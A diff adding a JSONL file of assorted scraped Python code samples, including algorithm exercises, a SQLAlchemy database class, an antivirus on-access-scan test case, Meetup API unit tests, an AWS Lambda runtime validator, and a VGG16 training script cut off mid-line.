diff --git "a/4714.jsonl" "b/4714.jsonl" new file mode 100644--- /dev/null +++ "b/4714.jsonl" @@ -0,0 +1,677 @@ +{"seq_id":"14230913","text":"# 자연수 N에 몇 번의 연산을 통해 다른 자연수 M을 만든다.\n# +1, -1, *2, -10 -> 4가지 연산이 있을 때,\n# 최소 몇번의 연산을 거쳐야 M을 만들 수 있는가?\n\n# N =2, M=7\n# (2+1)*2+1= 7 최소 3번의 연산 필요하다.\n\n# 2 7 -> 3번\n# 3 15 -> 4번\n# 36 1007 -> 8번\n\nfrom collections import deque\n\ndef operation():\n global result\n while Q:\n front, check = Q.popleft()\n if front == M:\n result = check\n return\n for i in range(4):\n if i == 0:\n if 1<= front + 1 <= 1000000 and visited[front+1] == False:\n Q.append((front+1, check+1))\n visited[front+1] = True\n elif i == 1:\n if 1<= front-1 <= 1000000 and visited[front-1] == False:\n Q.append((front-1, check+1))\n visited[front-1] = True\n elif i == 2:\n if 1 <= front * 2 <= 1000000 and visited[front*2] == False:\n Q.append((front*2, check+1))\n visited[front*2] = True\n elif i == 3:\n if i<= front-10 <=1000000 and visited[front-10] ==False:\n Q.append((front-10, check+1))\n visited[front-10] = True\n\nT = int(input())\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n result = 0\n visited = [False] * 1000001\n Q = deque()\n Q.append((N, 0))\n operation()\n\n print(\"#{} {}\".format(tc, result))","sub_path":"SWEA/advanced/그래프기본과 탐색/연산.py","file_name":"연산.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636699037","text":"def get_checksum(spreadsheet):\n \"\"\"\n :param spreadsheet: list: of lists of numbers\n :return: sum of the differences between max & min in each row\n \"\"\"\n cumulative_checksum = 0\n for row in spreadsheet:\n diff = max(row) - min(row)\n cumulative_checksum += diff\n return cumulative_checksum\n\n\nif __name__ == '__main__':\n raw_spreadsheet = open('raw_spreadsheet.txt').readlines()\n spreadsheet = []\n for row in raw_spreadsheet:\n spreadsheet.append([int(v) for v in row.split('\t')])\n print('checksum: ' + str(get_checksum(spreadsheet)))\n","sub_path":"advent2017/day02/corruption_checksum.py","file_name":"corruption_checksum.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47639769","text":"#! /usr/bin/python3\n\ndef count_twos(limit):\n \"\"\"\n Accept a number and count the number of appearances of \"2\" digits.\n \"\"\"\n\n count = 0\n\n for integer in range(limit + 1):\n count += str(integer).count('2')\n\n print('%i (is the number of appearances of \"2\" between 0 and %i)' \n % (count, limit))\n\n\nif __name__ == \"__main__\":\n import sys, timeit\n \n # Sanity check CLI command.\n if len(sys.argv) >= 2:\n print(timeit.timeit(\"count_twos(int(sys.argv[1]))\", setup=\"from __main__ import count_twos\", number=10))\n #count_twos(int(sys.argv[1]))\n else:\n print('Please enter a number.')\n","sub_path":"sendbloom/count_twos_v2.py","file_name":"count_twos_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239782669","text":"from sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nfrom Station import Station\n\nclass Database(object):\n\n def __init__(self):\n self.dbLocation = 'mysql+pymysql://root@localhost/MPD_MANAGEMENT'\n self.session = self.createSession()\n\n def createSession(self):\n engine = create_engine(self.dbLocation)\n Session = sessionmaker(bind=engine)\n session = Session()\n return session\n\n def storeStation(self, station):\n self.session.add(station)\n self.session.commit()\n\n def removeStation(self, station):\n (self.session.query(Station).filter_by(name=station.getName())).delete()\n self.session.commit()\n\n def getActiveStations(self):\n stations = self.session.query(Station).all()\n return stations\n\n def getStation(self, name):\n station = (self.session.query(Station).filter_by(name=name)).first()\n if station is not None:\n print('retrieving' + station.getName())\n return station\n raise NameError\n\n def checkStored(self, name):\n print('checking ' + name)\n if (self.session.query(Station).filter_by(name=name)).count():\n return True\n else:\n return False\n\n def getFreeSlot(self): # Poor time complexity, fix\n stations = self.session.query(Station).all()\n takenPorts = []\n for station in stations:\n takenPorts.append(int(station.httpPort) - 8000)\n\n for i in range(0, 100):\n if i not in takenPorts:\n return i\n\n \n def updateState(self, obj):\n self.session.merge(obj)\n self.session.commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"34088460","text":"from components.ui.help_window import Ui_HelpWindow\nfrom components.window import SubWindow\n\n\nclass HelpDoc(SubWindow):\n\n def __init__(self, name='HelpDoc', parent=None):\n super().__init__(name, parent, Ui_HelpWindow())\n with open(\"Readme.md\", \"r\", encoding=\"utf-8\") as input_file:\n text = input_file.read()\n self.ui.textBrowser.setMarkdown(text)\n","sub_path":"components/help_doc.py","file_name":"help_doc.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"116188783","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: lsh-678\n# TestcaseDescription: Scanning a program/joke on read,write and execute with read,write and execute pe\n\nimport sys\nimport logging\nimport shutil\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nsys.path.append('..')\nimport commonAntiMalwareFns\nimport commonOASFns\nimport commonFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : lsh-678\")\n logging.info(\"Description : Scanning a program/joke on read,write and execute with read,write and execute pe\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n self._joke_file_source = self.getConfig('PAYLOAD_PATH') + '/jokes/COMJOKE.COM'\n self._joke_file_target = os.path.dirname(os.path.abspath(sys.argv[0])) + '/lsh-678'\n self._original_dat =\"/opt/NAI/LinuxShield/engine/dat\"\n self._original_old_dat =\"/opt/NAI/LinuxShield/engine/dat_old\"\n self._eit_dat=self.getConfig('PAYLOAD_PATH') + '/jokes/dat'\n if self._cleanup() != 0 :\n return 1 \n if not os.path.exists(self._joke_file_source) :\n logging.error(\"Payload directory does not exist.\")\n return 1\n if not os.path.exists(self._joke_file_target) :\n os.mkdir(self._joke_file_target)\n if not commonOASFns.disableOAS() :\n logging.error(\"Failed to disable OAS for payload copy\")\n return 1\n try :\n logging.debug(\"Copying the payload\")\n shutil.move(self._original_dat,self._original_old_dat)\n shutil.copytree(self._eit_dat,self._original_dat)\n except :\n logging.error(\"Failed to copy the payload\")\n return 1\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n logging.debug(\"Copying the payload\")\n shutil.copy(self._joke_file_source, self._joke_file_target)\n except :\n logging.error(\"Failed to copy as expected\")\n return 1\n if not commonOASFns.setOASPrimaryAction(\"Rename\"):\n logging.error(\"failed to set primary action\")\n return 1\n if not commonOASFns.setOASSecondaryAction(\"Delete\"):\n logging.error(\"failed to set secondry action\")\n return 1\n if not commonOASFns.enableOAS() :\n logging.error(\"Failed to enable OAS after payload copy\")\n return 1\n self._jokefile_path= self._joke_file_target+\"/\"+\"COMJOKE.COM\"\n _p =subprocess.call([\"file\",self._jokefile_path])\n if _p!=0:\n logging.info(\"file comand failed as expected\")\n return 0\n return 0 \n \n def verify(self):\n if os.path.exists(self._jokefile_path):\n loggging.error(\"file has to be delete\")\n return 1\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n \n def _cleanup(self):\n _retval = 0\n logging.debug(\"Resetting to defaults\")\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n logging.debug(\"Removing the macro target directory\")\n #if os.path.exists(self._joke_file_target) :\n #shutil.rmtree(self._joke_file_target)\n if os.path.exists(self._original_old_dat) :\n shutil.rmtree(self._original_dat)\t\t\n shutil.move(self._original_old_dat,self._original_dat)\n return _retval\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_Scan_Actions_4.py","file_name":"OAS_Scan_Actions_4.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528496236","text":"\n# 参考: https://qiita.com/takayg1/items/c811bd07c21923d7ec69\n# 単位元 と 結合法則 (交換則は成り立たなくてOK) が必要! それらがあれば O(N)→O(log N) にできる.)\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(logN)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, l, r):\n \"\"\"\n [l, r)のsegfuncしたものを得る\n l: index(0-index)\n r: index(0-index)\n \"\"\"\n res = self.ide_ele\n\n l += self.num\n r += self.num\n while l < r:\n if l & 1:\n res = self.segfunc(res, self.tree[l])\n l += 1\n if r & 1:\n res = self.segfunc(res, self.tree[r - 1])\n l >>= 1\n r >>= 1\n return res\n","sub_path":"library/SegTree.py","file_name":"SegTree.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270077549","text":"# use dummy head.\n# store previous. \n# head of reverse\n# next \n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseBetween(self, head: ListNode, m: int, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n current = head\n prev = dummy\n nextt = dummy # record current's original next\n reverse_head = dummy # record prev to m'th \n reverse_last = dummy # record m'th\n counter = 1\n while current is not None:\n nextt = current.next\n if counter == m:\n reverse_head = prev\n reverse_last = current\n elif counter > m and counter < n:\n current.next = prev\n elif counter == n:\n # fix reverse head\n nextt = current.next\n current.next = prev \n reverse_head.next = current\n reverse_last.next = nextt\n break\n prev = current \n current = nextt\n counter += 1\n return dummy.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\nhead.next.next.next.next = ListNode(5)\nm = 2\nn = 4\nhead = Solution().reverseBetween(head, m, n)\nwhile head is not None:\n print(head.val)\n head = head.next","sub_path":"leetcode1-115/92. Reverse Linked List II.py","file_name":"92. Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300682137","text":"import numpy as np\nimport cv2\nimport time\n\npath = \"img_test/space/\"\nname = \"space\" + str(4) + \".jpg\"\nimg_path = path + name\ndebug = True\n\nimg = cv2.imread(img_path)\nimg = cv2.resize(img, (700, 400))\ncopy = img\nshape = list(img.shape)\n\n\n#\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n# 105\nsensitivity = 90\nlower_white = np.array([0, 0, 255 - sensitivity])\nupper_white = np.array([255, sensitivity, 255])\nmask = cv2.inRange(hsv, lower_white, upper_white)\nimg = cv2.bitwise_and(img, img, mask=mask)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('test', img)\ncv2.waitKey()\ncv2.imwrite(path + 'result/' + name, img)\n","sub_path":"recognition/discover_space.py","file_name":"discover_space.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399859597","text":"# Python script to calculate the distance measures (features) for all of the tracked face data\n# \nimport os\n\n# Supporting method to calculate distance between two points\ndef distance_between(n1, n2):\n\treturn (abs(n1[0] - n2[0])**2 + abs(n1[1] - n2[1])**2)**0.5\n\n# Supporting method to calculate midpoint of two points\ndef point_between(n1, n2):\n\tx = [n1[0], n2[0]]\n\ty = [n1[1], n2[1]]\n\treturn (abs(x[0] - x[1])/2 + min(x), abs(y[0] - y[1])/2 + min(y))\n\nemotions = {\n\t\"Angry\"\t\t: 1,\n\t\"Contempt\" \t: 2,\n\t\"Fear\" \t\t: 3,\n\t\"Happy\" \t: 4,\n\t\"Sadness\" \t: 5,\n\t\"Surprise\" \t: 6,\n\t\"Natural\" \t: 7 # Other\n}\n\ndata = {}\nfout = open(\"emotions.train\", \"w\")\nfor name in [\"Happy\", \"Sadness\", \"Surprise\", \"Angry\", \"Contempt\", \"Fear\", \"Natural\"]:\n\tdata[str(emotions[name])] = []\n\tfor sequence in os.listdir('Face data/' + name):\n\t\tdata[str(emotions[name])].append([])\n\t\tfor entry in open('Face data/' + name + \"/\" + sequence):\n\t\t\tx, y = [float(a) for a in entry.strip().replace(\" \", \" \").split(\" \")]\n\t\t\tdata[str(emotions[name])][-1].append((x, y))\n\nfor key in data:\n\tfor index in range(len(data[key])):\n\t\ti = 1\n\t\tvertex = [0.0] + data[key][index]\n\n\t\tfout.write(key)\n\n\t\tleft_eye = point_between(vertex[37], vertex[40])\n\t\tright_eye = point_between(vertex[43], vertex[46])\n\t\tbetween_eyes = distance_between(left_eye, right_eye)\n\t\tnose = point_between(vertex[31], vertex[34])\n\t\tfor x in range(1, 17 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(32, 36 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(37, 42 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(43, 48 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(49, 66 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(0, 5):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[18+x], vertex[27-x]) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[53], vertex[57]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[52], vertex[58]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[51], vertex[59]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[49], vertex[55]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[50], vertex[54]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[60], vertex[56]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[61], vertex[66]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[62], vertex[65]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[63], vertex[64]) / between_eyes))\n\t\tfout.write(\"\\n\")\n","sub_path":"Classifiers/database-specific multi-class/rafd/calculatefeatures.py","file_name":"calculatefeatures.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578203656","text":"\"\"\"\nPython Runtime Validation\n\"\"\"\n\nimport logging\nimport os\nimport subprocess\n\nfrom aws_lambda_builders.exceptions import MisMatchRuntimeError\n\nLOG = logging.getLogger(__name__)\n\n\nclass PythonRuntimeValidator(object):\n SUPPORTED_RUNTIMES = {\n \"python2.7\",\n \"python3.6\",\n \"python3.7\"\n }\n\n def __init__(self, runtime):\n self.language = \"python\"\n self.runtime = runtime\n self._valid_runtime_path = None\n\n def has_runtime(self):\n \"\"\"\n Checks if the runtime is supported.\n :param string runtime: Runtime to check\n :return bool: True, if the runtime is supported.\n \"\"\"\n return self.runtime in self.SUPPORTED_RUNTIMES\n\n def validate(self, runtime_path):\n \"\"\"\n Checks if the language supplied matches the required lambda runtime\n :param string runtime_path: runtime to check eg: /usr/bin/python3.6\n :raises MisMatchRuntimeError: Version mismatch of the language vs the required runtime\n \"\"\"\n if not self.has_runtime():\n LOG.warning(\"'%s' runtime is not \"\n \"a supported runtime\", self.runtime)\n return\n\n cmd = self._validate_python_cmd(runtime_path)\n\n p = subprocess.Popen(cmd,\n cwd=os.getcwd(),\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n if p.returncode != 0:\n raise MisMatchRuntimeError(language=self.language,\n required_runtime=self.runtime,\n runtime_path=runtime_path)\n else:\n self._valid_runtime_path = runtime_path\n return self._valid_runtime_path\n\n def _validate_python_cmd(self, runtime_path):\n major, minor = self.runtime.replace(self.language, \"\").split('.')\n cmd = [\n runtime_path,\n \"-c\",\n \"import sys; \"\n \"assert sys.version_info.major == {major} \"\n \"and sys.version_info.minor == {minor}\".format(\n major=major,\n minor=minor)]\n return cmd\n\n @property\n def validated_runtime_path(self):\n return self._valid_runtime_path if self._valid_runtime_path is not None else None\n","sub_path":"aws_lambda_builders/workflows/python_pip/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491697259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPURPOSE: For testing meetup models\nAUTHOR: dylangregersen\nDATE: Mon Sep 15 00:52:58 2014\n\"\"\"\n# ########################################################################### #\n\n# import modules \n\nfrom __future__ import print_function, division, unicode_literals\nimport time\nimport unittest\n\nfrom mock import MagicMock\nfrom mock import Mock\nfrom mock import patch\nimport requests\n\nfrom meetup.api import MeetupClient\n\n\nMEETUP_KEY = \"abc123\"\n\n\n# ########################################################################### #\n\n\nclass MeetupClientTests(unittest.TestCase):\n \"\"\"Tests that ensure GET requests function correctly.\n \"\"\"\n\n def setUp(self):\n self.client = MeetupClient(api_key=MEETUP_KEY)\n self.json_body = MagicMock()\n self.response_headers = {\n 'X-RateLimit-Remaining': \"14\",\n 'X-RateLimit-Reset': \"2\"\n }\n self.mock_json = Mock(return_value=self.json_body)\n self.mock_response = Mock(\n headers=self.response_headers,\n json=self.mock_json\n )\n\n @patch.object(requests, \"get\")\n def test_invoke_get_calls_requests(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"member_id\": \"12345\"\n },\n method=\"GET\"\n )\n mock_get.assert_called_once_with(\n \"https://api.meetup.com/2/groups\"\n \"?page=1000\"\n \"&key=abc123\"\n \"&member_id=12345\"\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"post\")\n def test_invoke_post_calls_requests(self, mock_post):\n mock_post.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"name\": \"Awesome Team\"\n },\n method=\"POST\"\n )\n mock_post.assert_called_once_with(\n \"https://api.meetup.com/2/groups\",\n data={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"name\": \"Awesome Team\"\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"delete\")\n def test_invoke_delete_calls_requests(self, mock_delete):\n mock_delete.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups/awesome-team\",\n params={\n \"id\": 72\n },\n method=\"DELETE\"\n )\n mock_delete.assert_called_once_with(\n \"https://api.meetup.com/2/groups/awesome-team\",\n params={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"id\": 72\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(time, \"sleep\")\n @patch.object(requests, \"get\")\n def test_hit_rate_limit_waits(self, mock_get, mock_sleep):\n mock_get.return_value = self.mock_response\n self.response_headers['X-RateLimit-Remaining'] = \"0\"\n self.response_headers['X-RateLimit-Reset'] = \"4\"\n self.client.invoke(\"2/groups/foo\")\n\n self.response_headers['X-RateLimit-Reset'] = \"2\"\n self.client.invoke(\"2/groups/bar\")\n self.assertEqual(2, len(mock_get.call_args_list))\n mock_sleep.assert_called_once_with(4)\n\n mock_sleep.reset_mock()\n self.client.invoke(\"2/groups/chew\")\n mock_sleep.assert_called_once_with(2)\n\n @patch.object(requests, \"get\")\n def test_get_next_page_uses_meta_to_fetch_next(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"next\": \"http://meetup.foo.co/page-2\"\n }\n }\n )\n mock_get.assert_called_once_with(\"http://meetup.foo.co/page-2\")\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n def test_get_next_page_no_next_is_none(self):\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"prev\": \"http://fifo.com/1\"\n }\n }\n )\n self.assertIsNone(result)\n\n def test_get_next_page_no_meta_is_none(self):\n result = self.client.get_next_page({})\n self.assertIsNone(result)\n\n\n\n# ########################################################################### #\nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"meetup/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623230834","text":"#takes the ATL zoo and converts it into .dsltrans files\n\nfrom ZipDownloader import ZipDownloader\nfrom ZipHandler import ZipHandler\nfrom ConvertATL2XMI import ConvertATL2XMI\nfrom RTEHandler import RTEHandler\nfrom ConvertATL2DSLTrans import ConvertATL2DSLTrans\n\nclass ZooConverter:\n\n def __init__(self, zip_dir, trans_dir):\n self.zip_dir = zip_dir\n self.trans_dir = trans_dir\n\n def download_zips(self, zoo_site):\n ZipDownloader(zoo_site, self.zip_dir)\n\n def separate_transformations(self):\n zh = ZipHandler(self.zip_dir, self.trans_dir)\n zh.unzip()\n\n def run_atl_to_xmi(self):\n cax = ConvertATL2XMI(self.trans_dir)\n cax.set_up()\n cax.convert()\n cax.tear_down()\n\n def run_types_trans(self):\n rte = RTEHandler(self.trans_dir)\n rte.run()\n\n def run_atl_to_dsltrans(self):\n catd = ConvertATL2DSLTrans(self.trans_dir)\n catd.set_up()\n catd.convert()\n catd.tear_down()\n\nif __name__ == \"__main__\":\n\n zoo_site = \"https://www.eclipse.org/atl/atlTransformations/\"\n zip_dir = \"./zip_dir\"\n trans_dir = \"./example_dir\"\n zc = ZooConverter(zip_dir, trans_dir)\n\n zc.download_zips(zoo_site)\n\n zc.separate_transformations()\n\n zc.run_atl_to_xmi()\n\n zc.run_types_trans()\n\n zc.run_atl_to_dsltrans()","sub_path":"converter/zoo_to_dsltrans.py","file_name":"zoo_to_dsltrans.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402133995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 15 09:15:07 2020\n\n@author: Frank\n\"\"\"\n\n\n############################################################\n# DES: Define VGG16 CNN and train model.\n# Once trained, export model to working directory.\n############################################################\n\n############################################################\n# Libraries:\n############################################################\n\nimport os\n#import scripts.set_working_dir as set_wd\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import RMSprop\nimport math\nfrom itertools import product\n\n#########################################################\n# Set Working Directory:\n# - Ensure RELATIVE working directory (so it can be replicated by any user)\n# - Ensure users can read data using either Windows or UNIX folders\n# - Working directory should be '.\\scripts' for windows or './scripts' for UNIX\n#########################################################\n\n#working_dir = set_wd.set_correct_working_dir()\n\n############################################################\n# Define LeNet model:\n# - Parameters to change:\n# - - Optimisation\n# - - Loss function\n############################################################\n\n#########################################\n# Define combinations of paramters:\n#########################################\n\n# Loss functions\nloss_fns = ['binary_crossentropy', 'mean_squared_error', 'mean_squared_logarithmic_error', 'sparse_categorical_crossentropy']\n\n# Optimisation for SGD learning rate:\nopts = [0.1, 0.01, 0.001]\n\n# combinations:\ncombos = list(product(loss_fns, opts))\n\ni = combos[1]\n\n#########################################\n# Define X models (X = len(loss_fns)*len(opts)\n#########################################\n\nfor i in combos:\n\n VGG16_cnn_model = tf.keras.models.Sequential()\n VGG16_cnn_model.add(Conv2D(input_shape=(224,224,3),filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n \n \n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dense(units=4096,activation=\"relu\"))\n #model.add(Dense(units=2, activation=\"softmax\"))\n model.add(Dense(units=1, activation=\"softmax\"))\n \n #VGG16_cnn_model.compile(optimizer='adam',\n # loss='sparse_categorical_crossentropy',\n # metrics=['accuracy'])\n\n\n #model_summary = VGG16_cnn_model.summary()\n #print(model_summary)\n\n sgd = tf.keras.optimizers.SGD(learning_rate= i[1], 